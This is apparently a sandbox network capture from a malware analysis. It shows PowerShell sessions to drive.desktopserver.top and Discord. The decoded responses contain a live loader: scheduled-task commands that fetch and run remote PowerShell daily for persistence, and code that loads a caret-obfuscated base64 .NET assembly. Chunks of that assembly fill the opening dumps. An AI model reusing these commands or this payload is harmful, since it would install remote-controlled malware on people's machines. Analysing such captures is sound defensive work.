                                                                                                                                          Data Ascii: A^oqwEA^BiUmg^AQAAA^QgBgA^AADgz^////I^IwAAA^AoEQA^ABiUm^gAYAA^AQgBA^AAADg^Y////^fmcCA^AQoBA^gABiU^mIKMA^AAAoE^QAABi^Umfmg^CAAQo^CAgAB^ihgAg^AGfmk^CAAQo^DAgAB^iUmIK^YAAAA^oEQAA^BiCpA^AAAKB^EAAAY^lJn5q^AgAEK^BAIAA^aABwA^ABCAA^AAAAf^gYCAA^R7GQI^ABDms^/v//J^i
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 5e 46 42 41 41 41 5e 41 46 38 41 41 5e 41 41 46 41 41 5e 41 41 65 67 41 5e 41 41 42 59 41 5e 41 41 41 34 57 5e 67 41 41 41 48 5e 4d 53 41 41 41 5e 4b 45 77 49 67 5e 41 67 41 41 41 5e 44 6a 56 2f 2f 5e 2f 2f 45 51 41 5e 52 41 48 35 76 5e 41 67 41 45 4b 5e 43 51 49 41 41 5e 59 6c 4a 68 45 5e 41 66 6e 41 43 5e 41 41 51 6f 4b 5e 41 67 41 42 69 5e 55 6d 66 6e 45 5e 43 41 41 51 6f 5e 4c 41 67 41 42 5e 68 4d 4a 49 41 5e 45 41 41 41 42 5e 2b 42 67 49 41 5e 42 48 73 65 41 5e 67 41 45 4f 5a 5e 66 2f 2f 2f 38 5e 6d 49 41 45 41 5e 41 41 41 34 6a 5e 50 2f 2f 2f 78 5e 45 41 66 67 73 5e 41 41 41 52 2b 5e 62 67 49 41 42 5e 43 67 67 43 41 5e 41 47 49 41 4d 5e 41 41 41 41 34 5e 63 66 2f 2f 2f 5e 77 41 52 41 68 5e 45 4a 46 69 69 5e 66 41 51 41 47 5e 63 78 4d 41 41 5e 41 6f
                                                                                                                                          Data Ascii: ^FBAAA^AF8AA^AAFAA^AAegA^AABYA^AAA4W^gAAAH^MSAAA^KEwIg^AgAAA^DjV//^//EQA^RAH5v^AgAEK^CQIAA^YlJhE^AfnAC^AAQoK^AgABi^UmfnE^CAAQo^LAgAB^hMJIA^EAAAB^+BgIA^BHseA^gAEOZ^f///8^mIAEA^AAA4j^P///x^EAfgs^AAAR+^bgIAB^CggCA^AGIAM^AAAA4^cf///^wARAh^EJFii^fAQAG^cxMAA^Ao
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 41 42 44 6f 50 5e 41 41 41 41 4a 5e 69 41 41 41 41 5e 41 41 4f 41 51 5e 41 41 41 44 2b 5e 44 41 34 41 52 5e 51 4d 41 41 41 5e 41 46 41 41 41 5e 41 47 77 41 41 5e 41 45 51 41 41 5e 41 41 34 41 41 5e 41 41 41 42 45 5e 41 66 6e 4d 43 5e 41 41 51 6f 4e 5e 41 67 41 42 69 5e 41 43 41 41 41 5e 41 4f 4e 54 2f 5e 2f 2f 38 62 52 5e 51 45 41 41 41 5e 44 32 2f 2f 2f 5e 2f 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42 48 5e 73 53 41 67 41 5e 45 4f 62 62 2f 5e 2f 2f 38 6d 49 5e 41 41 41 41 41 5e 41 34 71 2f 2f 5e 2f 2f 39 77 67 5e 41 41 41 41 41 5e 48 34 47 41 67 5e 41 45 65 79 67 5e 43 41 41 51 35 5e 32 2f 76 2f 2f 5e 79 59 67 41 41 5e 41 41 41 44 6a 5e 51 2b 2f 2f 2f 5e 63 78 55 41 41 5e 41 6f 54 41 43 5e 41 42 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 4a 5e 67 49 41
                                                                                                                                          Data Ascii: ABDoP^AAAAJ^iAAAA^AAOAQ^AAAD+^DA4AR^QMAAA^AFAAA^AGwAA^AEQAA^AA4AA^AAABE^AfnMC^AAQoN^AgABi^ACAAA^AONT/^//8bR^QEAAA^D2///^/IAAA^AAB+B^gIABH^sSAgA^EObb/^//8mI^AAAAA^A4q//^//9wg^AAAAA^H4GAg^AEeyg^CAAQ5^2/v//^yYgAA^AAADj^Q+///^cxUAA^AoTAC^ABAAA^AfgYC^AAR7J^gIA
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 42 44 71 34 5e 2f 2f 2f 2f 4a 5e 69 41 42 41 41 5e 41 41 4f 4b 33 5e 2f 2f 2f 38 63 5e 52 51 45 41 41 5e 41 44 32 2f 2f 5e 2f 2f 49 41 45 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 76 7a 41 51 5e 41 45 4f 59 2f 5e 2f 2f 2f 38 6d 5e 49 41 51 41 41 5e 41 41 34 68 50 5e 2f 2f 2f 78 45 5e 49 66 6e 4d 43 5e 41 41 51 6f 4e 5e 41 67 41 42 69 5e 41 44 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 43 5e 41 49 41 42 44 5e 70 6b 2f 2f 2f 5e 2f 4a 69 41 43 5e 41 41 41 41 4f 5e 46 6e 2f 2f 2f 5e 2f 63 45 51 4d 5e 36 53 41 41 41 5e 41 43 41 43 41 5e 41 41 41 4f 41 5e 51 41 41 41 44 5e 2b 44 41 6f 41 5e 52 51 4d 41 41 5e 41 41 70 41 41 5e 41 41 56 41 41 5e 41 41 41 55 41 5e 41 41 41 34 4a 5e 41 41 41 41 44 5e 68 4b 41 41 41 5e 41 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42
                                                                                                                                          Data Ascii: BDq4^////J^iABAA^AAOK3^///8c^RQEAA^AD2//^//IAE^AAAB+^BgIAB^HvzAQ^AEOY/^///8m^IAQAA^AA4hP^///xE^IfnMC^AAQoN^AgABi^ADAAA^AfgYC^AAR7C^AIABD^pk///^/JiAC^AAAAO^Fn///^/cEQM^6SAAA^ACACA^AAAOA^QAAAD^+DAoA^RQMAA^AApAA^AAVAA^AAAUA^AAA4J^AAAAD^hKAAA^AIAAA^AAB+B^gIAB
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 6a 67 41 5e 41 41 41 41 41 5e 69 67 59 41 41 5e 41 4b 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 45 41 67 5e 41 45 4f 52 51 5e 41 41 41 41 6d 5e 49 41 41 41 41 5e 41 41 34 43 51 5e 41 41 41 44 6a 5e 43 2f 2f 2f 2f 5e 2f 67 77 41 41 5e 45 55 43 41 41 5e 41 41 42 51 41 5e 41 41 43 73 41 5e 41 41 41 34 41 5e 41 41 41 41 41 5e 49 44 66 51 30 5e 41 41 41 51 67 5e 41 51 41 41 41 5e 48 34 47 41 67 5e 41 45 65 78 77 5e 43 41 41 51 35 5e 30 2f 2f 2f 2f 5e 79 59 67 41 51 5e 41 41 41 44 6a 5e 49 2f 2f 2f 2f 5e 4b 67 41 41 4f 5e 69 73 46 4b 47 5e 47 58 56 30 63 5e 43 65 77 30 41 5e 41 41 51 71 41 5e 44 59 72 42 53 5e 68 77 2f 32 46 5e 50 4b 43 63 41 5e 41 41 59 71 41 5e 41 41 36 4b 77 5e 55 6f 6e 51 39 5e 5a 53 51 41 6f 5e 70 41 4d 41 42 5e 69 6f 41 51 69
                                                                                                                                          Data Ascii: jgA^AAAAA^igYAA^AKIAA^AAAB+^BgIAB^HtEAg^AEORQ^AAAAm^IAAAA^AA4CQ^AAADj^C////^/gwAA^EUCAA^AABQA^AACsA^AAA4A^AAAAA^IDfQ0^AAAQg^AQAAA^H4GAg^AEexw^CAAQ5^0////^yYgAQ^AAADj^I////^KgAAO^isFKG^GXV0c^Cew0A^AAQqA^DYrBS^hw/2F^PKCcA^AAYqA^AA6Kw^UonQ9^ZSQAo^pAMAB^ioAQi
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 41 4b 5e 41 41 41 41 4f 5e 48 37 2f 2f 2f 5e 38 52 41 43 67 5e 77 41 41 41 47 5e 4a 53 59 54 41 5e 53 41 46 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 4b 51 49 41 42 5e 44 70 66 2f 2f 5e 2f 2f 4a 69 41 5e 46 41 41 41 41 5e 4f 46 54 2f 2f 5e 2f 38 62 52 51 5e 45 41 41 41 44 5e 32 2f 2f 2f 2f 5e 49 41 41 41 41 5e 41 42 2b 42 67 5e 49 41 42 48 74 5e 67 41 67 41 45 5e 4f 54 62 2f 2f 5e 2f 38 6d 49 41 5e 41 41 41 41 41 5e 34 4b 2f 2f 2f 5e 2f 78 45 41 45 5e 51 46 2b 67 41 5e 49 41 42 43 68 5e 6f 43 41 41 47 5e 4a 53 59 54 42 5e 43 41 43 41 41 5e 41 41 2f 67 34 5e 43 41 44 67 48 5e 2f 2f 2f 2f 30 5e 43 73 41 41 41 5e 59 6d 49 41 59 5e 41 41 41 41 34 5e 2b 2f 37 2f 2f 5e 7a 6a 4c 2f 2f 5e 2f 2f 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 6c 41 67 5e
                                                                                                                                          Data Ascii: AK^AAAAO^H7///^8RACg^wAAAG^JSYTA^SAFAA^AAfgY^CAAR7^KQIAB^Dpf//^//JiA^FAAAA^OFT//^/8bRQ^EAAAD^2////^IAAAA^AB+Bg^IABHt^gAgAE^OTb//^/8mIA^AAAAA^4K///^/xEAE^QF+gA^IABCh^oCAAG^JSYTB^CACAA^AA/g4^CADgH^////0^CsAAA^YmIAY^AAAA4^+/7//^zjL//^//IAA^AAAB+^BgIAB^HtlAg^
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 41 5e 42 69 67 31 41 5e 41 41 47 4a 53 5e 59 36 58 41 45 5e 41 41 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 44 51 49 5e 41 42 44 6c 53 5e 2f 2f 2f 2f 4a 5e 69 41 42 41 41 5e 41 41 4f 45 66 5e 2f 2f 2f 38 34 5e 35 51 41 41 41 5e 43 41 41 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 43 67 49 41 42 5e 44 6b 75 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 43 50 2f 2f 5e 2f 2f 64 65 50 5e 2f 2f 2f 79 41 5e 46 41 41 41 41 5e 4f 42 54 2f 2f 5e 2f 38 63 52 51 5e 45 41 41 41 44 5e 32 2f 2f 2f 2f 5e 49 41 51 41 41 5e 41 42 2b 42 67 5e 49 41 42 48 74 5e 66 41 67 41 45 5e 4f 66 62 2b 2f 5e 2f 38 6d 49 41 5e 6f 41 41 41 41 5e 34 36 2f 37 2f 5e 2f 78 45 44 46 5e 31 67 54 41 79 5e 41 4e 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 2b 5e 51 45 41 42 44 5e 6e
                                                                                                                                          Data Ascii: A^Big1A^AAGJS^Y6XAE^AACAA^AAAAf^gYCAA^R7DQI^ABDlS^////J^iABAA^AAOEf^///84^5QAAA^CAAAA^AAfgY^CAAR7^CgIAB^Dku//^//JiA^AAAAA^OCP//^//deP^///yA^FAAAA^OBT//^/8cRQ^EAAAD^2////^IAQAA^AB+Bg^IABHt^fAgAE^Ofb+/^/8mIA^oAAAA^46/7/^/xEDF^1gTAy^ANAAA^AfgYC^AAR7+^QEABD^n
                                                                                                                                          2024-09-30 16:58:21 UTC1369INData Raw: 5e 4f 67 49 41 42 5e 44 72 54 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 4d 6a 2f 2f 5e 2f 38 71 41 41 5e 41 54 4d 41 51 5e 41 36 41 41 41 5e 41 41 67 41 41 5e 42 45 72 42 53 5e 69 42 63 68 51 5e 37 49 41 49 41 5e 41 41 44 2b 44 5e 67 45 41 4f 41 5e 41 41 41 41 44 5e 2b 44 41 45 41 5e 52 51 55 41 41 5e 41 41 46 41 41 5e 41 41 6a 77 41 5e 41 41 45 6b 41 5e 41 41 42 37 41 5e 41 41 41 48 41 5e 41 41 41 44 67 5e 41 41 41 41 41 5e 45 67 41 65 4b 5e 45 4d 41 41 41 5e 5a 39 46 77 41 5e 41 42 43 41 45 5e 41 41 41 41 4f 5e 4d 76 2f 2f 2f 5e 38 53 41 48 77 5e 59 41 41 41 45 5e 45 67 41 6f 41 5e 51 41 41 4b 79 5e 41 44 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 37 5e 51 45 41 42 44 5e 6d 70 2f 2f 2f 5e 2f 4a 69 41 43 5e 41 41 41 41 4f 5e 4a 37 2f 2f 2f 5e 38 53
                                                                                                                                          Data Ascii: ^OgIAB^DrT//^//JiA^AAAAA^OMj//^/8qAA^ATMAQ^A6AAA^AAgAA^BErBS^iBchQ^7IAIA^AAD+D^gEAOA^AAAAD^+DAEA^RQUAA^AAFAA^AAjwA^AAEkA^AAB7A^AAAHA^AAADg^AAAAA^EgAeK^EMAAA^Z9FwA^ABCAE^AAAAO^Mv///^8SAHw^YAAAE^EgAoA^QAAKy^ADAAA^AfgYC^AAR77^QEABD^mp///^/JiAC^AAAAO^J7///^8S


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.549744162.159.135.2344438288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:23 UTC187OUTGET /?v=9&encording=json HTTP/1.1
                                                                                                                                          Connection: Upgrade,Keep-Alive
                                                                                                                                          Upgrade: websocket
                                                                                                                                          Sec-WebSocket-Key: 6pu1vC0lzYj5eQLGnNvoqQ==
                                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                                          Host: gateway.discord.gg
                                                                                                                                          2024-09-30 16:58:23 UTC616INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:23 GMT
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b6Gh1pMgRQAAMy6lbfJ%2BSf0D2Br3IrF94zbHTf1VYUbviU0c4wvIVtaUko8U%2BBR6%2BGg2Hr6zSWwNRCX5HRf4R6XZ0AUfpC6QLsWESJVNjUf8D50PjPeyC2Kxj%2BhCEPaD6Bv22A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1e8ac47424c-EWR


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.549749104.21.92.1894439160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:25 UTC173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:26 UTC846INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:25 GMT; Max-Age=31536000
                                                                                                                                          Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:25 GMT; Max-Age=1209600
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jZdXu4TffLmca8XjQn1A5%2Bj1xC9wPSsK7WK4CX0oqxx7zZHbN3WSrP0fHQY3rhyebWxVanIEIg7gv7e8z8K%2FDgM9pFP9Ld8Eq2GgrDLzkYbYiAH2E3kqdsCUYtcnzqHXJJL79okHB%2FvBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f67f348c57-EWR
                                                                                                                                          2024-09-30 16:58:26 UTC523INData Raw: 32 63 36 0d 0a 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 43 6c 65 61 6e 65 72 52 65 73 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70 3a 2f 2f 64 72 69 76 65 2e 64 65 73 6b 74 6f 70 73 65 72 76 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 7c 20 50 6f 77 65 72 73 68 65 6c 6c 22 20 2f 73 63 20 64 61 69 6c 79 20 2f 73 74 20 30 39 3a 30 30 20 2f 66 20 3b 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 44 72 69 76 65 72 73 55 70 64 61 74 65 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70
                                                                                                                                          Data Ascii: 2c6schtasks /create /tn "CleanerRes" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f ; schtasks /create /tn "DriversUpdate" /tr "conhost.exe --headless powershell.exe -c irm http
                                                                                                                                          2024-09-30 16:58:26 UTC194INData Raw: 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 72 65 73 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 5e 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 55 70 64 61 74 65 4d 65 27 29 3b 0d 0a
                                                                                                                                          Data Ascii: er.top/file/res/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');
                                                                                                                                          2024-09-30 16:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.549750104.21.92.1894439208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:25 UTC173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:26 UTC844INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:26 GMT; Max-Age=31536000
                                                                                                                                          Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:26 GMT; Max-Age=1209600
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tJBZxmgl7U8qnEHqfdWnjejLpbrG70OfB4wgdunYLTcO5Dg1i51oTWVQ6kjxPy4I2cAB3MIcX9127NY8zlSb2fQnlrSwXrkFVoAhnOCpfvMsQaOoeOC%2FM5108VQZnMr1ZfCfRby11q%2BkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f68c570c82-EWR
                                                                                                                                          2024-09-30 16:58:26 UTC525INData Raw: 32 63 36 0d 0a 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 43 6c 65 61 6e 65 72 52 65 73 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70 3a 2f 2f 64 72 69 76 65 2e 64 65 73 6b 74 6f 70 73 65 72 76 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 7c 20 50 6f 77 65 72 73 68 65 6c 6c 22 20 2f 73 63 20 64 61 69 6c 79 20 2f 73 74 20 30 39 3a 30 30 20 2f 66 20 3b 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 44 72 69 76 65 72 73 55 70 64 61 74 65 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70
                                                                                                                                          Data Ascii: 2c6schtasks /create /tn "CleanerRes" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f ; schtasks /create /tn "DriversUpdate" /tr "conhost.exe --headless powershell.exe -c irm http
                                                                                                                                          2024-09-30 16:58:26 UTC192INData Raw: 2e 74 6f 70 2f 66 69 6c 65 2f 72 65 73 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 5e 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 55 70 64 61 74 65 4d 65 27 29 3b 0d 0a
                                                                                                                                          Data Ascii: .top/file/res/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');
                                                                                                                                          2024-09-30 16:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.549751104.21.92.1894439180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:25 UTC173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:26 UTC852INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:26 GMT; Max-Age=31536000
                                                                                                                                          Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:26 GMT; Max-Age=1209600
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PnXrNY5rXp3D%2Fj1oPxSgD%2FglhvY9q7L92yrjjroaer%2BeKDYBA5Q7V6QmyoECByWP4HEp%2Bq%2FknBmsAqrHTFpQd9OdPSIp1lOMuFiSSZiC%2FBlpFwB3JcmXlrfS3HDij77pwSvt9x39TLEvYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f67b39196c-EWR
                                                                                                                                          2024-09-30 16:58:26 UTC517INData Raw: 32 63 36 0d 0a 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 43 6c 65 61 6e 65 72 52 65 73 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70 3a 2f 2f 64 72 69 76 65 2e 64 65 73 6b 74 6f 70 73 65 72 76 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 7c 20 50 6f 77 65 72 73 68 65 6c 6c 22 20 2f 73 63 20 64 61 69 6c 79 20 2f 73 74 20 30 39 3a 30 30 20 2f 66 20 3b 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 44 72 69 76 65 72 73 55 70 64 61 74 65 22 20 2f 74 72 20 22 63 6f 6e 68 6f 73 74 2e 65 78 65 20 2d 2d 68 65 61 64 6c 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 63 20 69 72 6d 20 68 74 74 70
                                                                                                                                          Data Ascii: 2c6schtasks /create /tn "CleanerRes" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f ; schtasks /create /tn "DriversUpdate" /tr "conhost.exe --headless powershell.exe -c irm http
                                                                                                                                          2024-09-30 16:58:26 UTC200INData Raw: 6f 70 73 65 72 76 65 72 2e 74 6f 70 2f 66 69 6c 65 2f 72 65 73 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 5e 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 55 70 64 61 74 65 4d 65 27 29 3b 0d 0a
                                                                                                                                          Data Ascii: opserver.top/file/res/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');
                                                                                                                                          2024-09-30 16:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.54974820.12.23.50443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A3DFWFen5CsLoTP&MD=7SevKY14 HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                          2024-09-30 16:58:27 UTC560INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Expires: -1
                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
